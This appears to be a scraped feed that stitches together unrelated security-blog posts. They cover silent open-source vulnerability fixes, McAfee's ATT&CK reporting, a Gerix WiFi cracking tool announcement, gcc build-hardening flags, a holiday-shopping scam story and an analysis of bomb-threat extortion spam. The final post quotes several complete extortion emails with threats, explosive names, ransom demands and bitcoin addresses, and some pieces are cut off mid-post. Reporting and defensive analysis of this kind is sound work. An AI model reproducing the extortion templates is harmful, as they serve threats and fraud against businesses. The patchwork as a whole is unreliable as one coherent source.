When it comes to open source software, it’s natural for development and security leaders to want to know that the code they’re using is secure. Historically, they’ve relied on traditional software composition analysis solutions and the National Vulnerability Database to mine for open source issues. Yet there is a little-discussed fact that open source begets open source. We know that developers use open source libraries to speed up the development process by adding ready-made functionality to their code. The libraries that they select and use are called direct dependencies, and oftentimes those direct dependencies have dependencies of their own.

Just like any other piece of software, open source libraries often rely on other open source libraries to achieve the desired functionality and goal. When developers choose an open source library, they may not be aware of the indirect dependencies they are stitching into their software. At Veracode, we’ve seen anywhere from two to more than 10 levels of libraries being called on, one after the other. Once you start assessing each level of library, the volume of vulnerabilities can skyrocket beyond your team’s ability to manage them.

Using software composition analysis is an amazing first step to solving some of this open source risk, but what happens when an open source library contributor fixes a security vulnerability and doesn’t tell anyone? Or the time between submission and publication, with an organization like the National Vulnerability Database, is too long to wait?

A Database Is Only as Good as the Data it Captures

The National Vulnerability Database (NVD), upon which most traditional SCA solutions rely, is a robust and widely used source of vulnerability data available today, cataloguing tens of thousands of vulnerabilities across all application types and open source libraries. While it is no doubt a valuable and necessary library of flaws and fixes, through no fault of its own, the organization is unable to keep pace with the volume of vulnerabilities disclosed and updated on a daily basis. Open source library vulnerabilities get stuck in a logjam behind everything else that is disclosed.

It’s important to note that vulnerabilities only make it into the database if a software developer or independent security researcher submits them. It’s common for a vulnerability to be fixed, but never disclosed or submitted to the NVD. For example, the Apache Struts Remote Code Execution vulnerability – the same type that led to the Equifax breach in 2017 – was disclosed to the public in August 2018, but was patched in April of that same year.

Four months is plenty of time for malicious actors looking to take advantage of vulnerable software. If they were monitoring the commit logs of the library, they would have been aware of it before organizations could update to the latest version of the component.  

Machine Learning and Natural Language Close the Gap

Machine learning technology has the ability to automate the identification of potential security vulnerabilities from commit messages and bug reports. In open source projects, bugs are typically tracked with issue trackers, and code changes are merged in the form of commits to source control repositories. If an organization is able to monitor all of these repositories, and review each new bug issue and commit message, they could identify potential vulnerabilities. However, there are tens of thousands of open source repositories, with hundreds of thousands of bug tracking issues and commit messages to comb through, with new ones hitting every day.

Natural language processing and real machine learning can identify potential vulnerabilities in open source libraries with a high level of accuracy. By analyzing the patterns found in past commit messages and bug-tracking issues using machine learning, our model can identify when new commits or bug issues resemble a silent fix of a potential vulnerability. These potential vulnerabilities are then raised to security researchers.

These silent fixes can be a silent killer for your data protection.

Modern Software Composition Analysis Designed for Modern Application Development

We have developed our own database that includes all of the open source vulnerabilities in the NVD, as well as our own list of vulnerabilities in open source libraries that have not yet been disclosed to the NVD. In many cases, the vulnerabilities we find and record have either not been disclosed yet and are in the time between patching and full public disclosure, or in some cases, there was never any intent to disclose the vulnerability and its fix. There is a third category we track, which are “Reserved CVEs.” We take the Reserved CVE IDs from the NVD and then find the vulnerabilities in the public repos, in order to give you a head start on the fix prior to full public disclosure.

To learn more about how to use these silent fixes to your advantage by putting your development team on an even playing field with attackers, download our free white paper:

McAfee Advanced Threat Defense Incorporates the MITRE ATT&CK Framework to Help You Get the Play-by-Play Narrative on Adversaries

In the cybersecurity space, there’s a lot of talk about the “attacker advantage.” As a defender, you’re all too familiar with the concept. Every day, you and your team try to gain ground over adversaries who seem to get the jump on your defenses by exploiting the latest points of vulnerability. Gaining a better understanding of your adversaries and their work through the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) framework can help bolster your defenses. Available to everyone at no cost, ATT&CK is a shared knowledge base of information about the tactics, techniques, and procedures (TTPs) used in real-world campaigns.

What’s great about ATT&CK is that it not only gets into the details about how cybercriminals mastermind actual attacks, it also helps you strategize your defenses, align your security priorities, and make crucial adjustments to your arsenal. Ultimately, it helps you detect and respond more quickly and effectively when adversaries strike.

Additionally, since ATT&CK has been incorporated into security certification training courses, your junior analysts can upgrade their skill set. By gaining familiarity with the way adversaries act, your analysts can hone their threat-hunting abilities.

Another advantage is that everyone across your entire organization can speak the same language when communicating about security. The ATT&CK framework is a jargon-free zone. As a security professional, you can impart information to your peers and other stakeholders in ordinary, everyday language.

In close collaboration with the MITRE community, McAfee recognizes the value of the ATT&CK framework. With the latest release of McAfee Advanced Threat Defense, our advanced sandboxing analytics solution, we have mapped the ATT&CK framework directly to the reporting feature. McAfee Advanced Threat Defense offers a wide spectrum of easy-to-read, detailed reporting options—from summary reports for action prioritization to mapping results to the ATT&CK framework to analyst-grade malware data. We’ve made it really easy for analysts to quickly switch from identified TTPs in the McAfee Advanced Threat Defense MITRE ATT&CK report to the ATT&CK framework itself for a deeper dive into the specifics of any given attack or identified adversaries.

Apart from the all-important benefit of accelerating detection and response, incorporating the ATT&CK framework also helps analysts demystify their results when communicating with management and the executive team. When everyone uses a common framework to describe the realities of their risk, the whole organization can benefit by reaching consensus about security priorities.

To learn more about McAfee Advanced Threat Defense and the MITRE ATT&CK framework, check out these resources:

MITRE ATT&CK and ATT&CK are trademarks of The MITRE Corporation.

McAfee and the McAfee logo are trademarks or registered trademarks of McAfee, LLC or its subsidiaries in the United States and other countries. Other names and brands may be claimed as the property of others. Copyright ©2018 McAfee, LLC

The post McAfee Advanced Threat Defense Incorporates the MITRE ATT&CK Framework to Help You Get the Play-by-Play Narrative on Adversaries appeared first on McAfee Blogs.

Gerix WiFi Cracker – Wireless 802.11 Hacking Tool With GUI

Gerix WiFi Cracker is an easy-to-use wireless 802.11 hacking tool with a GUI. It was originally made to run on BackTrack, and this version has been updated for Kali (2018.1).

To get it up and running make sure you do:

apt-get install qt4-dev-tools

Running Gerix Wireless 802.11 Hacking Tool

$ python

You can download Gerix here:

Or read more here.

Read the rest of Gerix WiFi Cracker – Wireless 802.11 Hacking Tool With GUI now! Only available at Darknet.

Improved Ghillie Suits (IGS)

Personally I wish someone had pushed for the phrase “future update ghillie suits” (FUGS) when they were thinking about “future warfare”. Instead the US Army is talking about Improved Ghillie Suits (IGS) to address the shortcomings of past designs. Notable issues: If you dress like a tree, you may be as flammable as one (several …

Notes on Build Hardening

I thought I'd comment on a paper about "build safety" in consumer products, describing how software is built to harden it against hackers trying to exploit bugs.

What is build safety?

Modern languages (Java, C#, Go, Rust, JavaScript, Python, etc.) are inherently "safe", meaning they don't have "buffer-overflows" or related problems.

However, C/C++ is "unsafe", and is the most popular language for building stuff that interacts with the network. In other cases, while the language itself may be safe, it'll use underlying infrastructure ("libraries") written in C/C++. When we are talking about hardening builds, making them safe or secure, we are talking about C/C++.

In the last two decades, we've improved both hardware and operating-systems around C/C++ in order to impose safety on it from the outside. We do this with options when the software is built (compiled and linked), and then when the software is run.

That's what the paper above looks at: how consumer devices are built using these options, and thereby, measuring the security of these devices.

In particular, we are talking about the Linux operating system here and the GNU compiler gcc. Consumer products almost always use Linux these days, though a few also use embedded Windows or QNX. They are almost always built using gcc, though some are built using a clone known as clang (or llvm).

How software is built

Software is first compiled then linked. Compiling means translating the human-readable source code into machine code. Linking means combining multiple compiled files into a single executable.

Consider a program hello.c. We might compile it using the following command:

gcc -o hello hello.c

This command takes the file, hello.c, compiles it, then outputs (-o) an executable with the name hello.

We can set additional compilation options on the command-line here. For example, to enable stack guards, we'd compile with a command that looks like the following:

gcc -o hello -fstack-protector hello.c

In the following sections, we are going to look at specific options and what they do.

Stack guards

A running program has various kinds of memory, optimized for different use cases. One chunk of memory is known as the stack. This is the scratch pad for functions. When a function in the code is called, the stack grows with the additional scratchpad needs of that function, then shrinks back when the function exits. As functions call other functions, which call other functions, the stack keeps growing larger and larger. When they return, it then shrinks back again.

The scratch pad for each function is known as the stack frame. Among the things stored in the stack frame is the return address, where the function was called from so that when it exits, the caller of the function can continue executing where it left off.

The way stack guards work is to stick a carefully constructed value in between each stack frame, known as a canary. Right before the function exits, it'll check this canary in order to validate it hasn't been corrupted. If corruption is detected, the program exits, or crashes, to prevent worse things from happening.
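The mechanism can be sketched in plain C. This is only an illustrative simulation of what the compiler-generated code does; a real canary holds an unpredictable per-run value chosen by the runtime, and the names here are made up for the example:

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Sketch of a stack guard: a guard value sits between the buffer and
 * the rest of the stack frame, and is checked before the function
 * returns.  A fixed canary is used here only for illustration. */
#define CANARY 0xDEADBEEFCAFEF00DULL

struct frame {
    char buf[16];        /* local buffer, the overflow target */
    uint64_t canary;     /* guard value placed after the buffer */
};

/* Returns 1 if the copy stayed in bounds, 0 if the canary was
 * clobbered -- the real compiler-inserted check aborts instead. */
int guarded_copy(const char *input) {
    struct frame f;
    f.canary = CANARY;
    strcpy(f.buf, input);       /* deliberately unchecked copy */
    return f.canary == CANARY;  /* the check on function exit */
}
```

Feeding this more than 15 characters clobbers the simulated canary, which is exactly the corruption the compiler's check detects.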

This solves the most common exploited vulnerability in C/C++ code, the stack buffer-overflow. This is the bug described in that famous paper Smashing the Stack for Fun and Profit from the 1990s.

To enable this stack protection, code is compiled with the option -fstack-protector. This looks for functions that have typical buffers, inserting the guard/canary on the stack when the function is entered, and then verifying the value hasn't been overwritten before exit.

Not all functions are instrumented this way; for performance reasons, only those that appear to have character buffers are. Only those with buffers of 8 bytes or more are instrumented by default. You can change this by adding the option --param ssp-buffer-size=n, where n is the number of bytes. You can include other arrays in the check by using -fstack-protector-strong instead. You can instrument all functions with -fstack-protector-all.

Since this feature was added, many vulnerabilities have been found that evade the default settings. More recently, -fstack-protector-strong has been added to gcc, which significantly increases the number of protected functions. The setting -fstack-protector-all is still avoided due to performance cost, as even trivial functions which can't possibly overflow are still instrumented.

Heap guards

The other major dynamic memory structure is known as the heap (or the malloc region). When a function returns, everything in its scratchpad memory on the stack will be lost. If something needs to stay around longer than this, then it must be allocated from the heap rather than the stack.

Just as there are stack buffer-overflows, there can be heap overflows, and the same solution of using canaries can guard against them.

The heap has two additional problems. The first is use-after-free, when memory on the heap is freed (marked as no longer in use), and then used anyway. The other is double-free, where the code attempts to free the memory twice. These problems don't exist on the stack, because things are either added to or removed from the top of the stack, as in a stack of dishes. The heap looks more like the game Jenga, where things can be removed from the middle.
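The usual defensive idiom against the double-free case is to null the pointer when freeing, since free(NULL) is defined to do nothing. A small sketch, with a hypothetical free_and_null() helper (not a standard library function):

```c
#include <assert.h>
#include <stdlib.h>

/* Hypothetical helper: free through a pointer-to-pointer and null it,
 * so an accidental second call becomes a harmless no-op rather than a
 * double-free, and a later use-after-free dereference crashes
 * immediately instead of silently reading stale memory. */
void free_and_null(void **p) {
    free(*p);
    *p = NULL;
}
```

This doesn't replace heap guards, but it converts two of the worst heap bugs into ones that are easy to spot.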

Whereas stack guards change the code generated by the compiler, heap guards don't. Instead, the heap exists in library functions.

The most common library added by a linker is known as glibc, the standard GNU C library. However, this library is about 1.8-megabytes in size. Many of the home devices in the paper above may only have 4-megabytes of total flash drive space, so this is too large. Instead, most of these home devices use an alternate library, something like uClibc or musl, which is only 0.6-megabytes in size. In addition, regardless of the standard library used for other features, a program may still replace the heap implementation with a custom one, such as jemalloc.

Even if using a library that does heap guards, checking may not be enabled in the software. If using glibc, a program can still turn off checking internally (using mallopt), or it can be disabled externally, before running a program, by setting the environment variable MALLOC_CHECK_ to 0.

The above paper didn't evaluate heap guards. I assume this is because it can be so hard to check.


Address space layout randomization (ASLR)

When a buffer-overflow is exploited, a hacker will overwrite values pointing to specific locations in memory. That's because locations, the layout of memory, are predictable. It's a detail that programmers don't know when they write the code, but something hackers can reverse-engineer when trying to figure out how to exploit code.

Obviously a useful mitigation step would be to randomize the layout of memory, so nothing is in a predictable location. This is known as address space layout randomization or ASLR.

The word layout comes from the fact that when a program runs, it'll consist of several segments of memory. The basic list of segments is:

  • the executable code
  • static values (like strings)
  • global variables
  • libraries
  • heap (growable)
  • stack (growable)
  • mmap()/VirtualAlloc() (random location)

Historically, the first few segments are laid out sequentially, starting from address zero. Remember that user-mode programs have virtual memory, so what's located starting at 0 for one program is different from another.

As mentioned above, the heap and the stack need to be able to grow as functions are called and data is allocated from the heap. The way this is done is to place the heap after all the fixed-size segments, so that it can grow upwards. Then, the stack is placed at the top of memory, and grows downward (as functions are called, the stack frames are added at the bottom).

Sometimes a program may request memory chunks outside the heap/stack directly from the operating system, such as using the mmap() system call on Linux, or the VirtualAlloc() system call on Windows. This will usually be placed somewhere in the middle between the heap and stack.

With ASLR, all these locations are randomized, and can appear anywhere in memory. Instead of growing contiguously, the heap has to sometimes jump around things already allocated in its way, which is a fairly easy problem to solve, since the heap isn't really contiguous anyway (as chunks are allocated and freed from the middle). However, the stack has a problem. It must grow contiguously, and if there is something in its way, the program has little choice but to exit (i.e. crash). Usually, that's not a problem, because the stack rarely grows very large. If it does grow too big, it's usually because of a bug that requires the program to crash anyway.
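The layout described above can be observed directly by taking the address of an object in each segment. The sketch below assumes a typical Linux/x86-64 process, where the stack grows downward; the helper names are made up for the example:

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>

static int a_global = 1;  /* lives in the global-variable segment */

/* Called from stack_grows_down(); its frame sits "below" the
 * caller's frame on platforms where the stack grows downward. */
__attribute__((noinline))
static int frame_is_lower(const int *outer_local) {
    int inner_local = 0;
    return (uintptr_t)&inner_local < (uintptr_t)outer_local;
}

int stack_grows_down(void) {
    int outer_local = 0;
    return frame_is_lower(&outer_local);
}

/* A stack variable, a heap allocation, a global, and code each get
 * a distinct address in a distinct segment. */
int segments_are_distinct(void) {
    int on_stack = 0;
    void *on_heap = malloc(16);
    int ok = on_heap != NULL
          && (void *)&on_stack != on_heap
          && on_heap != (void *)&a_global
          && (void *)&a_global != (void *)&segments_are_distinct;
    free(on_heap);
    return ok;
}
```

Printing the actual pointer values across several runs is a simple way to see whether ASLR is active: with it enabled, the addresses change on every run.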

ASLR for code

The problem for executable code is that for ASLR to work, it must be made position independent. Historically, when code would call a function, it would jump to the fixed location in memory where that function was known to be located, thus it was dependent on its position in memory.

To fix this, code can be changed to jump to relative positions instead, where the code jumps at an offset from wherever it was jumping from.

To enable this on the compiler, the flag -fPIE (position independent executable) is used. Or, if building just a library and not a full executable program, the flag -fPIC (position independent code) is used.

Then, when linking a program composed of compiled files and libraries, the flag -pie is used. In other words, use -pie -fPIE when compiling executables, and -fPIC when compiling for libraries.

When compiled this way, exploits will no longer be able to jump directly into known locations for code.

ASLR for libraries

The above paper glossed over details about ASLR, probably just looking at whether an executable program was compiled to be position independent. However, code links to shared libraries that may or may not likewise be position independent, regardless of the settings for the main executable.

I'm not sure it matters for the current paper, as most programs had position independence disabled, but in the future, a comprehensive study will need to look at libraries as a separate case.

ASLR for other segments

The above paper equated ASLR with randomized locations for code, but ASLR also applies to the heap and stack. The randomization status of these segments is independent of whatever was configured for the main executable.

As far as I can tell, modern Linux systems will randomize these locations, regardless of build settings. Thus, for build settings, it's just code randomization that needs to be worried about. But when running the software, care must be taken that the operating system will behave correctly. A lot of devices, especially old ones, use older versions of Linux that may not have this randomization enabled, or may be using custom kernels where it has been turned off.


Relocation read-only (relro)

Modern systems have dynamic/shared libraries. Most of the code of a typical program consists of standard libraries. As mentioned above, the GNU standard library glibc is about 1.8-megabytes in size. Linking that into every one of hundreds of programs means gigabytes of disk space may be needed to store all the executables. It's better to have a single file on the disk that all programs can share.

The problem is that every program will load libraries into random locations. Therefore, code cannot jump to functions in the library, either with a fixed or relative address. To solve this, what position independent code does is jump to an entry in a table, relative to its own position. That table will then have the fixed location of the real function that it'll jump to. When a library is loaded, that table is filled in with the correct values.

The problem is that hacker exploits can also write to that table. Therefore, what you need to do is make that table read-only after it's been filled in. That's done with the "relro" flag, meaning "relocation read-only". An additional flag, "now", must be set to force this behavior at program startup, rather than waiting until later.

When passed to the linker, these flags would be "-z relro -z now". However, we usually call the linker directly from the compiler, and pass the flags through. This is done in gcc by doing "-Wl,-z,relro -Wl,-z,now".

Non-executable stack

Exploiting a stack buffer overflow has three steps:
  • figure out where the stack is located (mitigated by ASLR)
  • overwrite the stack frame control structure (mitigated by stack guards)
  • execute code in the buffer
We can mitigate the third step by preventing code from executing from stack buffers. The stack contains data, not code, so this shouldn't be a problem. In much the same way that we can mark memory regions as read-only, we can mark them no-execute. This should be the default, of course, but as the paper above points out, there are some cases where code is actually placed on the stack.

This option can be set with -Wl,-z,noexecstack, when compiling both the executable and the libraries. This is the default, so you shouldn't need to do anything special. However, as the paper points out, there are things that get in the way if you aren't careful. The setting is more what you'd call "guidelines" than actual "rules". Despite setting this flag, building software may result in an executable stack.

So, you may want to verify it after building the software, such as by running "readelf -l [programname]". This will tell you what the stack has been configured to be.
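As a sketch, on a Linux box with gcc and binutils installed, that verification looks something like the following (the file names are made up for the example):

```shell
# Build a trivial program, explicitly requesting a non-executable stack.
printf 'int main(void){return 0;}\n' > /tmp/nx_demo.c
gcc -o /tmp/nx_demo -Wl,-z,noexecstack /tmp/nx_demo.c

# The GNU_STACK program header shows the stack permissions:
# "RW" means readable/writable data only; "RWE" would mean executable.
readelf -l /tmp/nx_demo | grep -A1 GNU_STACK
```

If the flags line shows RWE, something in the build (often a stray assembly file without the right section note) re-enabled the executable stack.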

Non-executable heap

The above paper focused on the executable stack, but there is also the question of an executable heap. It likewise contains data and not code, so it should be marked no-execute. Like the heap guards mentioned above, this isn't a build setting but a feature of the library. The default library for Linux, glibc, marks the heap no-execute. However, it appears the other standard libraries and alternative heaps mark the heap as executable.


Fortify source

The paper above doesn't discuss this hardening step, but it's an important one.

One reason for so many buffer-overflow bugs is that the standard functions that copy buffers have no ability to verify whether they've gone past the end of a buffer. A common recommendation is to replace those inherently unsafe functions with safer alternatives that include length checks. For example, the notoriously unsafe function strcpy() can be replaced with strlcpy(), which adds a length check.
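Note that strlcpy() comes from the BSDs and historically hasn't shipped in glibc, so portable code often carries its own bounded copy. A sketch of such a helper; the name bounded_copy is invented, though the truncation and return-value convention mirror strlcpy:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Copy src into dst, writing at most size bytes and always
 * NUL-terminating when size > 0.  Returns strlen(src), so a result
 * >= size tells the caller the copy was truncated. */
size_t bounded_copy(char *dst, const char *src, size_t size) {
    size_t srclen = strlen(src);
    if (size > 0) {
        size_t n = (srclen < size - 1) ? srclen : size - 1;
        memcpy(dst, src, n);
        dst[n] = '\0';
    }
    return srclen;
}
```

Unlike strcpy(), the worst a too-long input can do here is get truncated, and the return value lets the caller detect that.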

Instead of editing the code, the GNU compiler can do this automatically. This is done with the build option -O2 -D_FORTIFY_SOURCE=2.

This is only a partial solution. The compiler can't always figure out the size of the buffer being copied into, and thus will leave the code untouched. Only when the compiler can figure things out does it make the change.

It's fairly easy to detect if code has been compiled with this flag, but the above paper didn't look much into it. That's probably for the same reason it didn't look into heap checks: it requires the huge glibc library. These devices use the smaller libraries, which don't support this feature.

Format string bugs

Because this post is about build hardening, I want to mention format-string bugs. This is a common bug in old code that can be caught by adding warnings for it in the build options, namely:
 -Wformat -Wformat-security -Werror=format-security
It's hard to check whether code has been built with these options, however. Unlike the issues above, which simple programs like readelf can verify, this would take static-analysis tools that read the executable code and reverse engineer what's going on.

Warnings and static analysis

When building code, the compiler will generate warnings about confusing constructs, possible bugs, or bad style. The compiler has a default set of warnings. Robust code is compiled with the -Wall flag, meaning "all" warnings, though it doesn't actually enable all of them. Paranoid code adds the -Wextra warnings to include those not covered by -Wall. There is also the -pedantic (or -Wpedantic) flag, which warns about strict C compatibility issues.

All of these warnings can be converted into errors, which prevent the software from building, using the -Werror flag. As shown above, this can also be applied to individual warning names (as in -Werror=format-security) to turn only some warnings into errors.

Optimization level

Compilers can optimize code, looking for common patterns, to make it go faster. You can set your desired optimization level.

Some features, notably FORTIFY_SOURCE, don't work without optimization enabled. That's why the example above specifies -O2, setting optimization level 2.

Higher levels aren't recommended. For one thing, they don't make code faster on modern, complex processors. The advanced processors in your desktop or mobile phone do extensive optimization themselves; what helps them is small code that fits within cache. The -O3 level makes code bigger, which is good for older, simpler processors but bad for modern, advanced ones.

In addition, the aggressive settings of -O3 have led to security problems around "undefined behavior". Even -O2 is a little suspect, with some guides suggesting the proper optimization level is -O1. However, some optimizations are actually more secure than no optimization at all, so for the security paranoid, -O1 should be considered the minimum.

What about sanitizers?

You can compile code with address sanitizers that do more comprehensive buffer-overflow checks, as well as undefined behavior sanitizers for things like integer overflows.

While these are good for testing and debugging, so far they've proven too difficult to get working in production code. They may become viable in the future.


If you are building code using gcc on Linux, here are the options/flags you should use:
-Wall -Wformat -Wformat-security -Werror=format-security -fstack-protector -pie -fPIE -D_FORTIFY_SOURCE=2 -O2 -Wl,-z,relro -Wl,-z,now -Wl,-z,noexecstack
If you are more paranoid, these options would be:
-Wall -Wformat -Wformat-security -Wstack-protector -Werror -pedantic -fstack-protector-all --param ssp-buffer-size=1 -pie -fPIE -D_FORTIFY_SOURCE=2 -O1 -Wl,-z,relro -Wl,-z,now -Wl,-z,noexecstack

Nterini – Fatoumata Diawara

In a story that I’m almost certain nobody has read (based on everyone I have asked about it), hundreds of thousands of letters seized by British warships centuries ago are now being digitized for analysis by the Union of the German Academies of Sciences and Humanities. Somewhere in the U.K. National Archives in London, … Continue reading Nterini – Fatoumata Diawara

Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online

It was the last item on my list and Christmas was less than a week away. I was on the hunt for a white North Face winter coat for my teenage daughter, which she had duly ranked as the most-important-die-if-I-don’t-get-it item on her wish list that year.

After fighting the crowds and scouring the stores to no avail, I went online, stressed and exhausted with my credit card in hand looking for a deal and a Christmas delivery guarantee.

Mistake #1: I was under pressure and cutting it way too close to Christmas.
Mistake #2: I was stressed and exhausted.
Mistake #3: I was adamant about getting the best deal.

Gimme a deal!

It turns out these mistakes created the perfect storm for a scam. I found a site with several name-brand coats available at lower prices. I was thrilled to find the exact white coat and a guaranteed delivery by Christmas. The cyber elves were working on my behalf for sure!

Only the coat never came and I was out $150.

In my haste and exhaustion, I overlooked a few key things about this “amazing” site that played into the scam. (I won’t harp on the part about calling customer service a dozen times, writing as many emails, and feeling incredibly stupid over my careless clicking!)

Stress = Digital Risk

I’m not alone in my holiday behaviors it seems. A recent McAfee survey, Stressed Holiday Online Shopping, reveals, unfortunately, that when it comes to online shopping, consumers are often more concerned about finding a deal online than they are with protecting their cybersecurity in the process. 

Here are the kinds of risks stressed consumers are willing to take to get a holiday deal online:

  • 53% think the financial stress of the holidays can lead to careless shopping online.
  • 56% said that they would use a website they were unfamiliar with if it meant they would save money.
  • 51% said they would purchase an item from an untrusted online retailer to get a good deal.
  • 31% would click on a link in an email to get a bargain, regardless of whether they were familiar with the sender.
  • When it comes to sharing personal information to get a good deal: 39% said they would risk sharing their email address, 25% would wager their phone number, and 16% would provide their home address.

4 Tips to Safer Online Shopping:

  • Connect with caution. Using public Wi-Fi might seem like a good idea at the moment, but you could be exposing your personal information or credit card details to cybercriminals eavesdropping on the unsecured network. If public Wi-Fi must be used to conduct transactions, use a virtual private network (VPN) to help ensure a secure connection.
  • Slow down and think before you click. Don’t be like me, exhausted and desperate while shopping online; think before you click! Cybercriminals love to target victims by using phishing emails disguised as holiday savings or shipping notifications to lure consumers into clicking links that could lead to malware or a phony website designed to steal personal information. Check directly with the source to verify an offer or shipment.
  • Browse with security protection. Use comprehensive security protection that can help protect devices against malware, phishing attacks, and other threats. Protect your personal information by using a home solution that keeps your identity and financial information secure.
  • Take a nap, stay aware. This may not seem like an important cybersecurity move, but during the holiday rush, stress and exhaustion can wear you down and contribute to poor decision-making online. Outsmarting the cybercrooks means staying aware and ahead of the threats.

I learned the hard way that holiday stress and shopping do not mix and can easily compromise my online security. I lost $150 that day and I put my credit card information (promptly changed) firmly into a crook’s hands. I hope by reading this, I can help you save far more than that.

Here’s wishing you and your family the Happiest of Holidays! May all your online shopping be merry, bright, and secure from all those pesky digital Grinches!

The post Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online appeared first on McAfee Blogs.

Bogus Bomb Threats Demanding Bitcoin Disrupt Businesses

Bogus bomb threats created a scare across the country. A quick note here that I'll dive into more deeply next week. The big question at this time, with MANY of the IP addresses found in email headers originating in Moscow, Russia: is this "Russian influence" designed to disrupt American commerce, or is this just a spammer looking for a new way to make money?


The more emails we have to analyze, the better our understanding of this threat will be. While reporting to the FBI is a great idea, and highly encouraged, that hides the details from security researchers such as myself. One great place to report any type of fraudulent bitcoin activity is "". If you decide to report there, please extract the sending IP address and the email Subject from your spam and include them as part of the report. We can cluster on both of those things. (Including the bitcoin address used is a given.)

Extracts taken from follow below. You can read the original reports yourselves here:

(If you have a sample of one of these emails, please consider filling out a - but please make sure to include the SENDING IP ADDRESS from the email headers!)

Email Bodies contain Spam-template randomization

Here are extracts from many of the spam messages. Note for example the [man | mercenary | recruited person] and [tronitrotoluene | Hexogen | Tetryl] substitutions. Or the [suspicious | unnatural | strange] [activity | behavior] or the [power the device | device will be blown up | power the bomb]. This is very characteristic spam behavior.

Subjects reported by the NCFTA include:

Subject: Better listen to me
Subject: Bomb is in your building
Subject: Do not panic
Subject: Do not waste your time
Subject: Dont get on my nerves
Subject: I advise you not to call the police
Subject: I've collected some very interesting content about you
Subject: keep calm
Subject: My device is inside your building
Subject: Think about how they can help you
Subject: Think twice
Subject: We can make a deal
Subject: You are my victim
Subject: You are responsible for people
Subject: Your building is under my control
Subject: Your life is in your hands
Subject: Your life can be ruined, concentrate
Subject: You're my victim

(If you have examples of other Subjects, please share them in the comments section)

Hello. There is the bomb (tronitrotoluene) in the building where your company is located. It is constructed under my direction. It has small dimensions and it is hidden very carefully, it is not able to damage the supporting building structure, but you will get many wounded people if it detonates. My recruited person is controlling the situation around the building. If he notices any strange activity or policemen the device will be blown up. I want to propose you a deal. $20'000 is the value for your safety. Pay it to me in BTC and I assure that I have to withdraw my recruited person and the bomb will not explode. But do not try to deceive me- my assurance will become actual only after 3 confirms in blockchain. It is my btc address : 15qH84uLC49CmC6jRE958Qjcf9WRZ2rMuM

Good day. My mercenary hid an explosive device (Hexogen) in the building where your business is conducted. It was assembled according to my instructions. It is compact and it is hidden very carefully, it is impossible to damage the structure of the building by this bomb, but in case of its explosion you will get many victims.My mercenary is watching the situation around the building. If he notices any suspicious behavior, panic or cops he will blow up the bomb.I want to propose you a bargain. You transfer me 20'000 usd in BTC and the bomb will not explode, but don't try to deceive me -I guarantee you that I have to withdraw my man only after 3 confirmations in blockchain network. It is my Bitcoin address : 1LrZorkdqzPsg8JaGLwjLwg35viiH1Sv9v You must send bitcoins by the end of the working day.

My mercenary has carried an explosive device (Tetryl) into the building where your company is located. It was assembled under my direction. It can be hidden anywhere because of its small size, it is impossible to destroy the building structure by this explosive device, but if it detonates there will be many victims. My recruited person is watching the situation around the building. If he sees any unusual behavior or policemen he will power the device. I would like to propose you a deal. 20.000 dollars is the cost for your life. Tansfer it to me in BTC and I ensure that I will call off my man and the bomb will not explode. But do not try to fool me- my warranty will become valid only after 3 confirms in blockchain network. Here is my BTC address - 15qH84uLC49CmC6jRE958Qjcf9WRZ2rMuM You have to pay me by the end of the working day, if you are late with the payment the device will explode.

Good day. I write you to inform you that my mercenary hid an explosive device (lead azide) in the building where your company is located. My recruited person constructed a bomb under my direction. It can be hidden anywhere because of its small size, it can not damage the supporting building structure, but you will get many victims in case of its explosion. My mercenary keeps the territory under the control. If he notices any unnatural behavior or emergency he will power the bomb. I can call off my man if you make a transfer. 20'000 usd is the price for your safety. Pay it to me in Bitcoin and I guarantee that I will call off my mercenary and the device will not detonate. But do not try to cheat- my assurance will become valid only after 3 confirmations in blockchain.

Good day. There is a bomb (tronitrotoluene) in the building where your company is conducted. My recruited person constructed the explosive device according to my instructions. It can be hidden anywhere because of its small size, it is impossible to destroy the structure of the building by my explosive device, but in case of its explosion you will get many victims. My man keeps the territory under the control. If any unnatural behavior, panic or emergency is noticed the device will be blown up. I can call off my recruited person if you make a transfer. 20'000 usd is the price for your safety. Tansfer it to me in Bitcoin and I ensure that I will withdraw my mercenary and the bomb won't explode. But do not try to deceive me- my warranty will become valid only after 3 confirms in blockchain network. My payment details (Bitcoin address): 1CDs3JXUU6wNmndAF7EFcrJ6GGSYRKXd7w

My man hid a bomb (lead azide) in the building where your business is conducted. It was constructed according to my guide. It is small and it is hidden very well, it is impossible to destroy the supporting building structure by this explosive device, but you will get many victims in the case of its detonation. My mercenary keeps the territory under the control. If any unnatural activityor emergency is noticed the bomb will be blown up. I would like to propose you a deal. You transfer me $20'000 in Bitcoin and explosive will not explode, but do not try to cheat -I warrant you that I will call off my man solely after 3 confirmations in blockchain network.

Hello. There is the bomb (lead azide) in the building where your business is conducted. My man built the explosive device according to my instructions. It is compact and it is hidden very carefully, it is impossible to damage the structure of the building by this explosive device, but if it detonates you will get many victims. I would like to propose you a bargain. 20.000 dollars is the cost for your life. Pay it to me in BTC and I guarantee that I have to call off my man and the device will not explode. But do not try to cheat- my guarantee will become valid only after 3 confirmations in blockchain network.

My man has carried the explosive device (tronitrotoluene) into the building where your business is conducted. My recruited person constructed the bomb according to my guide. It can be hidden anywhere because of its small size, it can not destroy the supporting building structure, but in the case of its detonation there will be many wounded people. My man is controlling the situation around the building. If any unnatural activity, panic or policeman is noticed the device will be blown up.
I write you to inform you that my recruited person carried the explosive device (Tetryl) into the building where your business is located. It is assembled according to my instructions. It can be hidden anywhere because of its small size, it is impossible to destroy the building structure by this bomb, but in case of its explosion there will be many victims. My man is controlling the situation around the building. If he sees any suspicious activity, panic or emergency the device will be exploded. I can withdraw my mercenary if you make a transfer. You transfer me 20.000 dollars in Bitcoin and the device will not detonate, but don't try to fool me -I ensure you that I will withdraw my recruited person only after 3 confirmations in blockchain. Here is my BTC address - 161JE4rHfvygXUVLya8N2WFptjwon2172t

These were EVERYWHERE - NOT targeted

Dozens of law enforcement agencies tweeted about these threats being received in their local area.  If you are aware of such "official" tweets, please leave a link to the Twitter Status report in the comments section below. 

